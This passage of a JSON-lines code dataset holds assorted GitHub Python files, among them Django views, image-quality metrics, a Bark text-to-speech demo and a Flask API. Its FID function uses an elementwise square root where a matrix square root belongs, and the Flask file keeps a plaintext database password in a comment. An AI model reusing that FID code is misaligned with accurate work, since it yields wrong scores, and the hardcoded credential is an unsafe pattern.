.id \"\"\"\n\n key = \"{}.{}\".format(obj.__class__.__name__, obj.id)\n self.__objects[key] = obj\n self.save()\n\n def save(self):\n \"\"\" serializes objects to the JSON file \"\"\"\n dicts = {}\n for key, value in self.__objects.items():\n dicts[key] = value.to_dict()\n with open(self.__file_path, 'w') as f:\n json.dump(dicts, f)\n\n def reload(self):\n \"\"\" deserializes the JSON file to objects \"\"\"\n if exists(self.__file_path):\n with open(self.__file_path, 'r') as f:\n dicts = json.load(f)\n for key, value in dicts.items():\n self.__objects[key] = BaseModel(**value)\n else:\n pass\n","repo_name":"IsmaelMolina-code/holbertonschool-AirBnB_clone","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15382545108","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Product\nfrom django.http import Http404\nfrom django.db.models import Avg, Min, Max\n\n\n# Create your views here.\n\ndef product_list(request):\n products = Product.objects.all().order_by('-rating')\n number_of_products = products.count()\n average = products.aggregate(Avg('rating'))\n return render(request, 'product_module/product_list.html', {\n 'products': products,\n 'total_number_of_product':number_of_products,\n 'average_ratings': average,\n })\n\n\n\ndef product_detail(request, slug):\n # try:\n # product = Product.objects.get(id=product_id)\n # except:\n # raise Http404()\n product = get_object_or_404(Product, slug=slug)\n return render(request, 'product_module/product_detail.html', {\n 'product': product\n })\n","repo_name":"Khodaprst/GitHub","sub_path":"eshop_project/product_module/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"13969098057","text":"import random\nim = open('Image/dos.pgm','w')\nim.write('P2\\n')\nim.write('# Hugo Araya Carrasco\\n')\nim.write('512 512\\n')\nim.write('255\\n')\nimagen = ''\nfor i in range(512*512):\n numero = random.randint(0,255)\n imagen = imagen + str(numero)+' '\n\nim.write(imagen+'\\n')\nim.close()","repo_name":"hugo-araya/Seccion1","sub_path":"imagen_pgm/ran.py","file_name":"ran.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18744116964","text":"from typing import List\n\n\nclass Solution:\n def minAvailableDuration(self, slots1: List[List[int]], slots2: List[List[int]], duration: int) -> List[int]:\n idx1 = idx2 = 0\n\n slots1 = sorted(slots1)\n slots2 = sorted(slots2)\n\n while idx1 <= len(slots1) - 1 and idx2 <= len(slots2) - 1:\n s1 = slots1[idx1]\n s2 = slots2[idx2]\n left_intersection = max(s1[0], s2[0])\n right_intersection = min(s1[1], s2[1])\n if right_intersection - left_intersection >= duration:\n return [left_intersection, left_intersection + duration]\n\n # always move the one that ends earlier!\n if s1[1] < s2[1]:\n idx1 += 1\n else:\n idx2 += 1\n\n return []\n","repo_name":"ivankliuk/leetcode","sub_path":"python/meeting-scheduler.py","file_name":"meeting-scheduler.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3088785121","text":"from collections import defaultdict\nfrom typing import *\n\nfrom tqdm import tqdm\n\nfrom backend.trainers.components.mappings.base import _display_creation_kickoff_message\nfrom backend.trainers.components.mappings.token.occurrences import (\n ParaphrasesPOSTagsList,\n ParaphrasesTokens,\n ParaphrasesTokensList\n)\nfrom backend.trainers.components.mappings.token.sentence_indices.base import SentenceIndex2UniqueTokens\nfrom backend.trainers.components.sentence_data import SentenceData\nfrom backend.utils import iterables, strings\n\n\ndef token_maps_foundations(\n sentence_data: SentenceData,\n tokenize_with_pos_tags: Callable[[str], List[Tuple[str, str]]]\n) -> Tuple[SentenceIndex2UniqueTokens, Tuple[ParaphrasesTokensList, ParaphrasesPOSTagsList]]:\n\n # create paraphrases map\n english_sentence_2_paraphrases_with_indices = _english_sentence_paraphrases_with_indices_map(sentence_data=sentence_data)\n\n # define foundations\n sentence_index_2_unique_tokens: SentenceIndex2UniqueTokens = {}\n paraphrases_tokens_list: ParaphrasesTokensList = []\n paraphrases_pos_tags_list: ParaphrasesPOSTagsList = []\n\n # procure proper nouns\n proper_nouns: Set[str] = sentence_data.deduce_proper_nouns()\n\n print('Creating token maps foundations...')\n for paraphrases_with_indices in tqdm(english_sentence_2_paraphrases_with_indices.values()):\n paraphrases, indices = iterables.unzip(paraphrases_with_indices)\n\n # tokenize paraphrases and procure pos tags\n paraphrases_tokens_with_pos_tags: List[List[Tuple[str, str]]] = [tokenize_with_pos_tags(sentence) for sentence in paraphrases]\n if any(map(len, paraphrases_tokens_with_pos_tags)):\n paraphrases_tokens, paraphrases_pos_tags = map(iterables.none_stripped, iterables.unzip_longest(map(lambda paraphrase_tokens_with_pos_tags: iterables.unzip(paraphrase_tokens_with_pos_tags), paraphrases_tokens_with_pos_tags)))\n\n # strip proper nouns, tokens containing digits; convert to lowercase\n paraphrases_tokens = _process_paraphrases_tokens(paraphrases_tokens, proper_nouns=proper_nouns)\n\n # update foundations\n sentence_index_2_unique_tokens.update({index: set(comprising_tokens) for index, comprising_tokens in zip(indices, paraphrases_tokens)})\n paraphrases_tokens_list.append(paraphrases_tokens)\n paraphrases_pos_tags_list.append(paraphrases_pos_tags)\n\n return sentence_index_2_unique_tokens, (paraphrases_tokens_list, paraphrases_pos_tags_list)\n\n\n@_display_creation_kickoff_message('Creating paraphrases map...')\ndef _english_sentence_paraphrases_with_indices_map(sentence_data: SentenceData) -> DefaultDict[str, List[Tuple[str, int]]]:\n english_sentence_2_paraphrases = defaultdict(list)\n\n for i, (english_sentence, foreign_sentence) in enumerate(tqdm(sentence_data)):\n english_sentence_2_paraphrases[english_sentence].append((foreign_sentence, i))\n\n return english_sentence_2_paraphrases\n\n\ndef _process_paraphrases_tokens(paraphrases_tokens: ParaphrasesTokens, proper_nouns: Set[str]) -> ParaphrasesTokens:\n \"\"\" Removes proper nouns, tokens containing digits from paraphrases tokens,\n converts tokens to lowercase \"\"\"\n\n for i, paraphrase_tokens in enumerate(paraphrases_tokens):\n lowercase_paraphrase_tokens = (token.lower() for token in paraphrase_tokens)\n paraphrases_tokens[i] = list(filter(lambda token: token not in proper_nouns and strings.is_digit_free(token), lowercase_paraphrase_tokens))\n\n return paraphrases_tokens\n","repo_name":"w2sv/Lingularity-DataMiner","sub_path":"src/token_maps/foundations.py","file_name":"foundations.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11486050607","text":"import warnings\n\nimport numpy as np\nfrom ranges import Range\n\nfrom .state import State\nfrom .extent import RectangleExtent, Point2D\nfrom .utils import int_log2\n\n\ndef empty_quadtree(extent: RectangleExtent, default=State.DEAD):\n from .node import Quadtree\n assert extent.width == extent.height\n level = int_log2(extent.width)\n return Quadtree.empty(level, default)\n\n\nclass Grid(np.ndarray):\n @classmethod\n def from_list(cls, l):\n return np.asarray(l, dtype=object).view(cls)\n\n def __repr__(self):\n return f\"{self.__class__.__name__}(shape={self.shape})\"\n\n def __str__(self):\n if self.ndim != 2:\n warnings.warn(f'Grid should be 2-dimensional, got shape {self.shape}')\n return super().__str__()\n elif self.shape[0] > 0 and self.shape[1] > 0 and not isinstance(self[0, 0], State):\n return super().__str__()\n return '\\n'.join(''.join(str(state) for state in row) for row in self)\n\n @classmethod\n def from_str(cls, s):\n s = s.strip()\n lines = s.splitlines()\n return np.array([[State.from_str(c) for c in line.strip()] for line in lines], dtype=object).view(cls)\n\n @classmethod\n def uninhabitable(cls, width, height):\n # np.full casts our IntEnum to int64 despite dtype=object, so we first\n # create an empty array and then fill it\n grid = np.empty((height, width), dtype=object)\n grid[:] = State.UNINHABITABLE\n return grid.view(cls)\n\n @classmethod\n def dead(cls, width, height):\n grid = np.empty((height, width), dtype=object)\n grid[:] = State.DEAD\n return grid.view(cls)\n\n\nclass LazyGrid:\n def __init__(self, default=State.DEAD):\n assert isinstance(default, State)\n self.default = default\n self._grids = []\n\n def add_grid(self, offset: Point2D, grid: Grid):\n assert isinstance(grid, Grid)\n assert isinstance(offset, Point2D)\n extent = RectangleExtent(Range(offset.x, offset.x + grid.shape[1]), Range(offset.y, offset.y + grid.shape[0]))\n self._grids.append((extent, grid))\n\n def get_quadtree(self, extent: RectangleExtent):\n from .node import QuadtreeBranch, QuadtreeLeaf\n assert extent.width == extent.height\n if extent.width == 1:\n return QuadtreeLeaf(self[Point2D(extent.x_range.start, extent.y_range.start)])\n elif not any(extent.intersects(other_extent) for other_extent, _ in self._grids):\n return empty_quadtree(extent, self.default)\n else:\n assert extent.width % 2 == 0 and extent.height % 2 == 0\n half_width = extent.width // 2\n half_height = extent.height // 2\n ((nw, ne), (sw, se)) = extent.split_x_y()\n return QuadtreeBranch(np.array([\n [self.get_quadtree(nw), self.get_quadtree(ne)],\n [self.get_quadtree(sw), self.get_quadtree(se)]\n ], dtype=object))\n\n def __getitem__(self, point: Point2D):\n values = []\n for extent, grid in self._grids:\n if point in extent:\n values.append(grid[point.y - extent.y_range.start, point.x - extent.x_range.start])\n if values:\n if values[0] == State.UNINHABITABLE:\n assert all(value == State.UNINHABITABLE for value in values)\n return State.UNINHABITABLE\n elif any(value == State.ALIVE for value in values): # OR all values\n return State.ALIVE\n else:\n return State.DEAD\n return self.default\n\n\nclass GridFromQuadtree:\n def __init__(self, quadtree):\n self.quadtree = quadtree\n\n def __getitem__(self, point: Point2D):\n return self.quadtree.get_state(point.x, point.y)\n\n def initial_quadtree_and_extent(self):\n return self.quadtree, RectangleExtent(\n Range(0, self.quadtree.width()),\n Range(0, self.quadtree.width()),\n )\n\n def expand_quadtree_and_extent(self, quadtree, extent: RectangleExtent):\n from .node import QuadtreeBranch\n empty = empty_quadtree(extent)\n if (extent.x_range.start + extent.x_range.end) // 2 > 0:\n # Midpoint is positive; expand north-west\n new_extent = RectangleExtent(\n Range(extent.x_range.start - extent.width, extent.x_range.end),\n Range(extent.y_range.start - extent.height, extent.y_range.end),\n )\n new_quadtree = QuadtreeBranch(np.array([\n [empty, empty],\n [empty, quadtree]\n ], dtype=object))\n else:\n # Midpoint is negative; expand south-east\n new_extent = RectangleExtent(\n Range(extent.x_range.start, extent.x_range.end + extent.width),\n Range(extent.y_range.start, extent.y_range.end + extent.height),\n )\n new_quadtree = QuadtreeBranch(np.array([\n [quadtree, empty],\n [empty, empty]\n ], dtype=object))\n return (new_quadtree, new_extent)\n","repo_name":"joliss/hashlife3d","sub_path":"src/hashlife3d/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40164374455","text":"import sys\nimport cv2\nimport argparse\nimport time\nfrom pose.openpose.import_libs import openpose, openpose_model_folder\n\ntry:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--image_dir\", default=\"../examples/media/\",\n help=\"Process a directory of images. Read all standard formats (jpg, png, bmp, etc.).\"\n )\n parser.add_argument(\"--no_display\", default=True, help=\"Enable to disable the visual display.\")\n args = parser.parse_known_args()\n\n # Custom Params (refer to include/openpose/flags.hpp for more parameters)\n params = dict()\n params[\"model_folder\"] = openpose_model_folder\n\n # Add others in path?\n for i in range(0, len(args[1])):\n curr_item = args[1][i]\n if i != len(args[1]) - 1:\n next_item = args[1][i + 1]\n else:\n next_item = \"1\"\n if \"--\" in curr_item and \"--\" in next_item:\n key = curr_item.replace('-', '')\n if key not in params: params[key] = \"1\"\n elif \"--\" in curr_item and \"--\" not in next_item:\n key = curr_item.replace('-', '')\n if key not in params: params[key] = next_item\n\n # Construct it from system arguments\n # op.init_argv(args[1])\n # oppython = op.OpenposePython()\n\n # Starting OpenPose\n opWrapper = openpose.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n # Read frames on directory\n imagePaths = openpose.get_images_on_directory(args[0].image_dir)\n start = time.time()\n\n # Process and display images\n for imagePath in imagePaths:\n datum = openpose.Datum()\n imageToProcess = cv2.imread(imagePath)\n datum.cvInputData = imageToProcess\n opWrapper.emplaceAndPop(openpose.VectorDatum([datum]))\n\n print(\"Body keypoints: \\n\" + str(datum.poseKeypoints))\n\n if not args[0].no_display:\n cv2.imshow(\"OpenPose 1.7.0 - Tutorial Python API\", datum.cvOutputData)\n key = cv2.waitKey(15)\n if key == 27:\n break\n\n end = time.time()\n print(\"OpenPose demo successfully finished. Total time: \" + str(end - start) + \" seconds\")\nexcept Exception as e:\n print(e)\n sys.exit(-1)\n","repo_name":"realzza/Presento","sub_path":"pose/openpose/04_keypoints_from_images.py","file_name":"04_keypoints_from_images.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"72626342812","text":"import cv2\nimport numpy as np\nimport torch\n\n# convert 2/3/4-dimensional torch tensor to uint\ndef tensor2uint(img: torch.Tensor):\n img = img.squeeze().float().clamp_(0, 1).cpu().numpy()\n if img.ndim == 3:\n img = np.transpose(img, (1, 2, 0))\n return np.uint8((img*255.0).round())\n \ndef calculate_psnr(img1, img2, crop_border=0, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are different: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n mse = np.mean((img1 - img2) ** 2)\n if mse == 0:\n return float('inf')\n return 20. * np.log10(255. / np.sqrt(mse))\n\n\ndef _ssim(img1, img2):\n C1 = (0.01 * 255) ** 2\n C2 = (0.03 * 255) ** 2\n\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n kernel = cv2.getGaussianKernel(11, 1.5)\n window = np.outer(kernel, kernel.transpose())\n\n mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5]\n mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5]\n mu1_sq = mu1 ** 2\n mu2_sq = mu2 ** 2\n mu1_mu2 = mu1 * mu2\n sigma1_sq = cv2.filter2D(img1 ** 2, -1, window)[5:-5, 5:-5] - mu1_sq\n sigma2_sq = cv2.filter2D(img2 ** 2, -1, window)[5:-5, 5:-5] - mu2_sq\n sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2\n\n ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n return ssim_map.mean()\n\n\ndef calculate_ssim(img1, img2, crop_border=0, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')\n if img1.dtype is not np.uint8:\n img1 = (img1 * 255.0).round().astype(np.uint8) # float32 to uint8\n if img2.dtype is not np.uint8:\n img2 = (img2 * 255.0).round().astype(np.uint8) # float32 to uint8\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n ssims = []\n for i in range(img1.shape[2]):\n ssims.append(_ssim(img1[..., i], img2[..., i]))\n return np.array(ssims).mean()\n\n\ndef _blocking_effect_factor(im):\n block_size = 8\n\n block_horizontal_positions = torch.arange(7, im.shape[3] - 1, 8)\n block_vertical_positions = torch.arange(7, im.shape[2] - 1, 8)\n\n horizontal_block_difference = (\n (im[:, :, :, block_horizontal_positions] - im[:, :, :, block_horizontal_positions + 1]) ** 2).sum(\n 3).sum(2).sum(1)\n vertical_block_difference = (\n (im[:, :, block_vertical_positions, :] - im[:, :, block_vertical_positions + 1, :]) ** 2).sum(3).sum(\n 2).sum(1)\n\n nonblock_horizontal_positions = np.setdiff1d(torch.arange(0, im.shape[3] - 1), block_horizontal_positions)\n nonblock_vertical_positions = np.setdiff1d(torch.arange(0, im.shape[2] - 1), block_vertical_positions)\n\n horizontal_nonblock_difference = (\n (im[:, :, :, nonblock_horizontal_positions] - im[:, :, :, nonblock_horizontal_positions + 1]) ** 2).sum(\n 3).sum(2).sum(1)\n vertical_nonblock_difference = (\n (im[:, :, nonblock_vertical_positions, :] - im[:, :, nonblock_vertical_positions + 1, :]) ** 2).sum(\n 3).sum(2).sum(1)\n\n n_boundary_horiz = im.shape[2] * (im.shape[3] // block_size - 1)\n n_boundary_vert = im.shape[3] * (im.shape[2] // block_size - 1)\n boundary_difference = (horizontal_block_difference + vertical_block_difference) / (\n n_boundary_horiz + n_boundary_vert)\n\n n_nonboundary_horiz = im.shape[2] * (im.shape[3] - 1) - n_boundary_horiz\n n_nonboundary_vert = im.shape[3] * (im.shape[2] - 1) - n_boundary_vert\n nonboundary_difference = (horizontal_nonblock_difference + vertical_nonblock_difference) / (\n n_nonboundary_horiz + n_nonboundary_vert)\n\n scaler = np.log2(block_size) / np.log2(min([im.shape[2], im.shape[3]]))\n bef = scaler * (boundary_difference - nonboundary_difference)\n\n bef[boundary_difference <= nonboundary_difference] = 0\n return bef\n\n\ndef calculate_psnrb(img1, img2, crop_border, input_order='HWC', test_y_channel=False):\n assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '\"HWC\" and \"CHW\"')\n img1 = reorder_image(img1, input_order=input_order)\n img2 = reorder_image(img2, input_order=input_order)\n img1 = img1.astype(np.float64)\n img2 = img2.astype(np.float64)\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...]\n\n if test_y_channel:\n img1 = to_y_channel(img1)\n img2 = to_y_channel(img2)\n\n img1 = torch.from_numpy(img1).permute(2, 0, 1).unsqueeze(0) / 255.\n img2 = torch.from_numpy(img2).permute(2, 0, 1).unsqueeze(0) / 255.\n\n total = 0\n for c in range(img1.shape[1]):\n mse = torch.nn.functional.mse_loss(img1[:, c:c + 1, :, :], img2[:, c:c + 1, :, :], reduction='none')\n bef = _blocking_effect_factor(img1[:, c:c + 1, :, :])\n\n mse = mse.view(mse.shape[0], -1).mean(1)\n total += 10 * torch.log10(1 / (mse + bef))\n\n return float(total) / img1.shape[1]\n\n\ndef reorder_image(img, input_order='HWC'):\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' \"'HWC' and 'CHW'\")\n if len(img.shape) == 2:\n img = img[..., None]\n if input_order == 'CHW':\n img = img.transpose(1, 2, 0)\n return img\n\n\ndef to_y_channel(img):\n img = img.astype(np.float32) / 255.\n if img.ndim == 3 and img.shape[2] == 3:\n img = rgb2ycbcr(img, y_only=True)\n img = img[..., None]\n else:\n raise ValueError(f'Wrong image shape [2]: {img.shape[2]}.')\n return img * 255.\n\n\ndef _convert_input_type_range(img):\n img_type = img.dtype\n img = img.astype(np.float32)\n if img_type == np.float32:\n pass\n elif img_type == np.uint8:\n img /= 255.\n else:\n raise TypeError('The img type should be np.float32 or np.uint8, ' f'but got {img_type}')\n return img\n\n\ndef _convert_output_type_range(img, dst_type):\n if dst_type not in (np.uint8, np.float32):\n raise TypeError('The dst_type should be np.float32 or np.uint8, ' f'but got {dst_type}')\n if dst_type == np.uint8:\n img = img.round()\n else:\n img /= 255.\n return img.astype(dst_type)\n\n\ndef rgb2ycbcr(img, y_only=False):\n img_type = img.dtype\n img = _convert_input_type_range(img)\n if y_only:\n out_img = np.dot(img, [65.481, 128.553, 24.966]) + 16.0\n else:\n out_img = np.matmul(\n img, [[65.481, -37.797, 112.0], [128.553, -74.203, -93.786],[24.966, 112.0, -18.214]]) + [16, 128, 128]\n out_img = _convert_output_type_range(out_img, img_type)\n return out_img\n\ndef calculate_fid_score(predicted_images, true_images, eps=1e-6):\n \"\"\"\n Calculates the Frechet Inception Distance (FID) score between predicted and true images.\n\n Args:\n predicted_images (torch.Tensor): Tensor containing the predicted images.\n true_images (torch.Tensor): Tensor containing the true images.\n eps (float): A small value to avoid division by zero. Default: 1e-6.\n\n Returns:\n float: The FID score between the predicted and true images.\n \"\"\"\n\n # Calculate the mean and covariance of the true images\n true_images = true_images.detach().cpu().numpy()\n true_images = np.transpose(true_images, (0, 2, 3, 1))\n true_images = (true_images * 255).astype(np.uint8)\n true_images = true_images.reshape(true_images.shape[0], -1)\n true_mean = np.mean(true_images, axis=0)\n true_cov = np.cov(true_images, rowvar=False)\n\n # Calculate the mean and covariance of the predicted images\n predicted_images = predicted_images.detach().cpu().numpy()\n predicted_images = np.transpose(predicted_images, (0, 2, 3, 1))\n predicted_images = (predicted_images * 255).astype(np.uint8)\n predicted_images = predicted_images.reshape(predicted_images.shape[0], -1)\n pred_mean = np.mean(predicted_images, axis=0)\n pred_cov = np.cov(predicted_images, rowvar=False)\n\n # Calculate the FID score\n fid = np.sum((true_mean - pred_mean)**2) + np.trace(true_cov + pred_cov - 2*np.sqrt(true_cov.dot(pred_cov))+eps)\n\n return fid","repo_name":"TheMoon2000/cs280-final-project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6572969962","text":"import time\r\nimport json\r\n\r\nfrom bot_word_functions import word_clear\r\nfrom bot_leader_functions import clear_leader\r\n\r\n\r\ndef first_run(message): # Create *.json\r\n players = [dict(id=message.from_user.id, first_name=message.from_user.first_name,\r\n username=message.from_user.username, total_score=0, event_score=0, address=None)]\r\n with open(f'{message.chat.title}.json', 'w+') as f:\r\n json.dump(dict(chat_id=message.chat.id, game_id=0, is_event=None, leader_id=None, hidden_word=None,\r\n players=players), f, indent=4, ensure_ascii=False)\r\n\r\n\r\ndef check_admin(message, admins) -> bool:\r\n admins_list = []\r\n for admin in admins:\r\n if not admin.user.is_bot:\r\n admins_list.append(admin.user.id)\r\n for admin_id in admins_list:\r\n if message.from_user.id == admin_id:\r\n return True\r\n\r\n\r\ndef get_game_id(message) -> int:\r\n with open(f'{message.chat.title}.json', 'r') as f:\r\n chat_data = json.load(f)\r\n chat_data['game_id'] = chat_data['game_id'] + 1\r\n with open(f'{message.chat.title}.json', 'w') as f:\r\n json.dump(chat_data, f, indent=4, ensure_ascii=False)\r\n return chat_data['game_id']\r\n\r\n\r\ndef show_stat(message) -> str:\r\n with open(f'{message.chat.title}.json', 'r') as f:\r\n players_dict = json.load(f)\r\n new_dict = {}\r\n for player in players_dict['players']:\r\n if not players_dict['is_event']:\r\n new_dict[player['first_name']] = player['total_score']\r\n else:\r\n new_dict[player['first_name']] = player['event_score']\r\n sorted_new_dict_tuples = sorted(new_dict.items(), key=lambda item: item[1], reverse=True)\r\n sorted_dict = {k: v for k, v in sorted_new_dict_tuples}\r\n message_text = []\r\n place = 0\r\n for k in sorted_dict:\r\n place += 1\r\n if not players_dict['is_event']:\r\n message_text.append(f'{place}. Счет: {sorted_dict.get(k)} - {k}')\r\n else:\r\n message_text.append(f'{place}. Earn: {sorted_dict.get(k)} VQRC - {k}')\r\n return '\\n'.join(message_text)\r\n\r\n\r\ndef clear_round_data(message):\r\n clear_leader(message)\r\n word_clear(message)\r\n time.sleep(1)\r\n\r\n","repo_name":"surugh/vqr_p2e_crocodile_bot","sub_path":"bot_functions.py","file_name":"bot_functions.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6736809699","text":"from django import forms\nfrom . import models\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n fields = (\"message\",\"files\",\"post\")\n model = models.Comment\n\n def __init__(self, *args, **kwargs):\n user = kwargs.pop(\"user\", None)\n super().__init__(*args, **kwargs)\n if user is not None:\n self.fields[\"post\"].queryset = (\n models.Post.objects.filter(\n pk__in=user.posts.values_list(\"post__pk\")\n )\n )\n","repo_name":"AgrawalNeha25/MyProdctivityToolKit","sub_path":"ToDo App/comments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"72609629531","text":"def ruler(num):\r\n i = 1\r\n list1 = \"\"\r\n list2 = \" \"\r\n while(i<=num):\r\n list1 += str(i % 10)\r\n i += 1\r\n if (i % 10 == 0):\r\n list2 += str(int(i / 10))\r\n else:\r\n list2 += \" \"\r\n\r\n print(list2)\r\n print(list1)\r\n\r\nnum = int(raw_input())\r\nruler(num)\r\n","repo_name":"harikad99/Python-Scripting--L1-Assignments","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13556696851","text":"from datetime import datetime\n\nfrom dateutil import rrule\nfrom optimum.bettertransformer import BetterTransformer\nfrom transformers import AutoProcessor, BarkModel\nimport scipy\nimport torch\n# my_now = datetime.now()\n\n# def get_current_device():\n# # print(\"get_current_device...\")\n#\n# DEVICE = \"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n# DEVICE_ID = \"0\"\n# CUDA_DEVICE = f\"{DEVICE}:{DEVICE_ID}\" if DEVICE_ID else DEVICE\n# # if debug:\n# print(f\"DEVICE:{DEVICE}\")\n# return DEVICE, CUDA_DEVICE\n#\n# DEVICE, CUDA_DEVICE = get_current_device()\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n# device = \"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\"\n\n# 指定本地模型\nmodel_path = \"/Users/jingwu/janewu/llm-model/bark/bark\"\nprocessor = AutoProcessor.from_pretrained(model_path)\nmodel = BarkModel.from_pretrained(model_path, torch_dtype=torch.float).to(device)\n\n# convert to bettertransformer\nmodel = BetterTransformer.transform(model, keep_original_model=False)\n\nsample_rate = model.generation_config.sample_rate\n\n\ndef do_tts(voice_preset, text_prompt, output_wave_fn):\n my_now = datetime.now()\n inputs = processor(text_prompt, voice_preset=voice_preset)\n # print(inputs)\n audio_array = model.generate(**inputs)\n audio_array = audio_array.cpu().numpy().squeeze()\n\n # save them as a .wav file\n scipy.io.wavfile.write(output_wave_fn, rate=sample_rate, data=audio_array)\n print(f\"[total spend]: {rrule.rrule(freq=rrule.SECONDLY, dtstart=my_now, until=datetime.now()).count()} seconds\")\n\n\ndef do_gen_example():\n # v2/en_speaker_6\" v2/en_speaker_0\"\n # \"v2/en_speaker_0\"\n text_prompt = \"Hi! Of course, we can talk about snacks. What would you like to discuss?\"\n # text_prompt = \"我是东圆有线网络有限公司的在线AI客服,由公司的开发团队开发。很抱歉,我无法提供开发者的联系方式。\"\n for i in range(10):\n voice_preset = f\"v2/en_speaker_{i}\"\n output_wave_fn = f\"bark_output_{i}.en.wav\"\n do_tts(voice_preset, text_prompt, output_wave_fn)\n\n\nif __name__ == '__main__':\n text_prompt = \"我是东圆有线网络有限公司的在线AI客服,由公司的开发团队开发。很抱歉,我无法提供开发者的联系方式。\"\n voice_preset = f\"v2/zh_speaker_0\"\n output_wave_fn = f\"bark_output_0.zh.wav\"\n do_tts(voice_preset, text_prompt, output_wave_fn)\n\n","repo_name":"janewu77/jshare-llm-demo","sub_path":"bark-demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"41930547761","text":"# distance calculation\n\nimport math\nimport time\nimport flask\nfrom flask import Flask\nimport requests\nfrom flask import request, jsonify\nfrom pymysql import *\nimport sys\nimport pandas as pd\nfrom flask import send_file\nfrom flask import render_template\n\napiKey = '**********'\ndb_name = \"guy_temps\"\nport = '1234'\nchart_template = 'chart_line.html'\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n#db_opts = {'user': 'root', 'password': 'pass2014', 'host': '172.17.0.3', 'database': 'temprature'}\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return 'Temperature data restAPI1> Take a look
